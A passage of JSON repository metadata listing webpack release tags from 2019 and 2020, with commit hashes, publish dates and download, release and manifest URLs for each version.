0.0-beta.17/manifests"},{"name":"v5.0.0-beta.16","sha":"b7f08b42b85f89e52facac426251d26ec64f2e6d","kind":"tag","published_at":"2020-05-05T22:03:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.16","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.16/manifests"},{"name":"v4.43.0","sha":"c9d4ff7b054fc581c96ce0e53432d44f9dd8ca72","kind":"tag","published_at":"2020-04-21T14:24:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.43.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.43.0/manifests"},{"name":"v5.0.0-beta.15","sha":"4c7e5e667bd30affa2e8c3bc8c65fd38e90912fe","kind":"tag","published_at":"2020-04-21T12:06:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.15","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.15/manifests"},{"name":"v4.42.1","sha":"71eb5931dbd7db125109a95692065333cea936a9","kind":"tag","published_at":"2020-03-24T06:23:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.42.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.1/manifests"},{"name":"v5.0.0-beta.14","sha":"59f8dc824ec169252476fa5b476e14c95f7bda40","kind":"tag","published_at":"2020-03-02T16:32:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.14","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.14/manifests"},{"name":"v4.42.0","sha":"29d851bf6d1e5d59eafb688d51396e70d12057c9","kind":"tag","published_at":"2020-03-02T08:41:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.42.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.0/manifests"},{"name":"v4.41.6","sha":"71be3bfa45a55aa8ea1b954ab1302565bb073bbc","kind":"tag","published_at":"2020-02-11T10:16:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.6","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.6/manifests"},{"name":"v5.0.0-beta.13","sha":"8445f06fa9abac1c98e6057af1c1fd2de63babbd","kind":"tag","published_at":"2020-01-29T21:23:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.13","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.13/manifests"},{"name":"v5.0.0-beta.12","sha":"228c1caaaff0938be2792cd516e5171cc2ce5e49","kind":"tag","published_at":"2020-01-16T00:09:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.12","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.12/manifests"},{"name":"v4.41.5","sha":"45ecebc9f0486c43efc7b56f2c31426d94a55264","kind":"tag","published_at":"2019-12-27T21:09:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.5/manifests"},{"name":"v5.0.0-beta.11","sha":"3e3b7a2e363dc7746cbde1abbfa188e8aa7f1dea","kind":"tag","published_at":"2019-12-24T07:28:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.11","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.11/manifests"},{"name":"v5.0.0-beta.10","sha":"bd21c4d04f15d54f3a8233b742aebdd4b62bb9c2","kind":"tag","published_at":"2019-12-22T00:06:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.10","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.10/manifests"},{"name":"v4.41.4","sha":"dcc45dd977356f08061b2e9451792c6218910891","kind":"tag","published_at":"2019-12-19T07:28:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.4/manifests"},{"name":"v4.41.3","sha":"df9f3eb7d9e4e60e53bfd1595d857bc7f912bc21","kind":"tag","published_at":"2019-12-16T09:33:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.3/manifests"},{"name":"v5.0.0-beta.9","sha":"3ae73b62326e12546949e1d21db25b93b064e81b","kind":"tag","published_at":"2019-12-08T21:50:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.9/manifests"},{"name":"v5.0.0-beta.8","sha":"9ffda5aee96a6456a2cfe11853d2a0bf5118c7cb","kind":"tag","published_at":"2019-12-08T21:44:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.8/manifests"},{"name":"v5.0.0-beta.7","sha":"697ebe81e13681093e9e643986e5011e0aa3a398","kind":"tag","published_at":"2019-11-20T21:51:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.7/manifests"},{"name":"v5.0.0-beta.6","sha":"de1e11b0b5209440a2992eb4ed7dd2ec30391c8f","kind":"tag","published_at":"2019-11-14T21:54:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.6/manifests"},{"name":"v5.0.0-beta.5","sha":"85145cebf3ed50014b36e76047681bbb066bbe1f","kind":"tag","published_at":"2019-11-13T13:32:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.5/manifests"},{"name":"v5.0.0-beta.4","sha":"f6f5364ad18fcf1b5a33e66d3350d6809ddb03e4","kind":"tag","published_at":"2019-11-12T18:09:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.4/manifests"},{"name":"v5.0.0-beta.3","sha":"43afd3d8ee53eb31a61ac78d4bfe067cd63a7fab","kind":"tag","published_at":"2019-11-06T00:09:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.3/manifests"},{"name":"v5.0.0-beta.2","sha":"b3e42f3d67df70d5d7cadb47efa2078b97a01ab8","kind":"tag","published_at":"2019-10-31T07:10:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.2/manifests"},{"name":"v5.0.0-beta.1","sha":"4940cb1536967ecfafb4267b2e912ef376481896","kind":"tag","published_at":"2019-10-22T15:56:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.1/manifests"},{"name":"v4.41.2","sha":"11e94dd2d0a8d8baae75e715ff8a69f27a9e3014","kind":"tag","published_at":"2019-10-15T13:01:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.2/manifests"},{"name":"v5.0.0-beta.0","sha":"1bd85218c0e5adc54f381a63e4187e5fe435a81f","kind":"tag","published_at":"2019-10-11T12:58:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.0/manifests"},{"name":"v5.0.0-alpha.32","sha":"8a73bc411b470f5d211053c99efbc1569d630f1b","kind":"tag","published_at":"2019-10-11T12:55:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.32","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.32","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.32","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.32","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.32/manifests"},{"name":"v4.41.1","sha":"dcfda0061cef24d68312216893da0b38f4a670f9","kind":"tag","published_at":"2019-10-11T11:42:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.1/manifests"},{"name":"v5.0.0-alpha.31","sha":"2bebf88509441835b71af9904e574ea6303642b7","kind":"tag","published_at":"2019-10-10T20:42:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.31","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.31","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.31","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.31/manifests"},{"name":"v5.0.0-alpha.30","sha":"05a01f3c281fec762c392ae1516ab32cc564859d","kind":"tag","published_at":"2019-10-07T14:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.30","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.30","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.30","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.30/manifests"},{"name":"v5.0.0-alpha.29","sha":"6709efb409383aae3c7821c1eea85de107f777b7","kind":"tag","published_at":"2019-10-02T06:01:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.29","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.29/manifests"},{"name":"v5.0.0-alpha.28","sha":"5aeef4793592113fe354a2f7f4a56dcb2c253dbe","kind":"tag","published_at":"2019-09-26T21:04:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.28","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.28/manifests"},{"name":"v5.0.0-alpha.27","sha":"b9ffbbaec3f6f5da2cab010baa928bbc545db918","kind":"tag","published_at":"2019-09-25T22:48:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.27","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.27/manifests"},{"name":"v4.41.0","sha":"36e318b75c62f4f4a95597e75ecf09d92069f3c4","kind":"tag","published_at":"2019-09-24T15:45:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.0/manifests"},{"name":"v4.40.3","sha":"b58560cf5cafdfe47a3ac3424a3d6ee95954759b","kind":"tag","published_at":"2019-09-24T15:39:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.3/manifests"},{"name":"v4.40.2","sha":"d1fffd8bbeb024d1452a7f7a33a4c0c87604d8ec","kind":"tag","published_at":"2019-09-13T14:29:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.2/manifests"},{"name":"v4.40.1","sha":"e4c7d8c0ae0c93306f07920bc28fe72119bc098a","kind":"tag","published_at":"2019-09-13T07:07:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.1/manifests"},{"name":"v4.40.0","sha":"9c6b36787fe43581d6c568e64b71656274c04881","kind":"tag","published_at":"2019-09-12T18:52:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.0/manifests"},{"name":"v5.0.0-alpha.26","sha":"77ef20c1e3e57149053588785f69a69a41f542fc","kind":"tag","published_at":"2019-09-08T20:58:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.26","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.26/manifests"},{"name":"v5.0.0-alpha.25","sha":"332a14596af7a5792b7b041aeb0cd7544a509c37","kind":"tag","published_at":"2019-09-06T13:37:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.25","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.25/manifests"},{"name":"v5.0.0-alpha.24","sha":"7c7c96d18c410f6cd4bf15db26650309661c75ea","kind":"tag","published_at":"2019-09-05T12:13:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.24","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.24/manifests"},{"name":"v5.0.0-alpha.23","sha":"4a88ea6de08677d4538201605408b42bdaa9c8c7","kind":"tag","published_at":"2019-08-27T17:17:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.23","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.23/manifests"},{"name":"v4.39.3","sha":"94929a59a79bc79cab789804d5592c3ec0605cc4","kind":"tag","published_at":"2019-08-27T12:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.3/manifests"},{"name":"v5.0.0-alpha.22","sha":"4bd900e790611f32431d46ec4af559bc90d267ff","kind":"tag","published_at":"2019-08-23T13:16:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.22","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.22/manifests"},{"name":"v5.0.0-alpha.21","sha":"2a7f242968c2597fb9b955645fe7f4b57b61d62e","kind":"tag","published_at":"2019-08-22T19:01:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.21","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.21/manifests"},{"name":"v5.0.0-alpha.20","sha":"8e1ea8385d10c13c15c79eb9c4146e071ef8d565","kind":"tag","published_at":"2019-08-14T08:21:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alp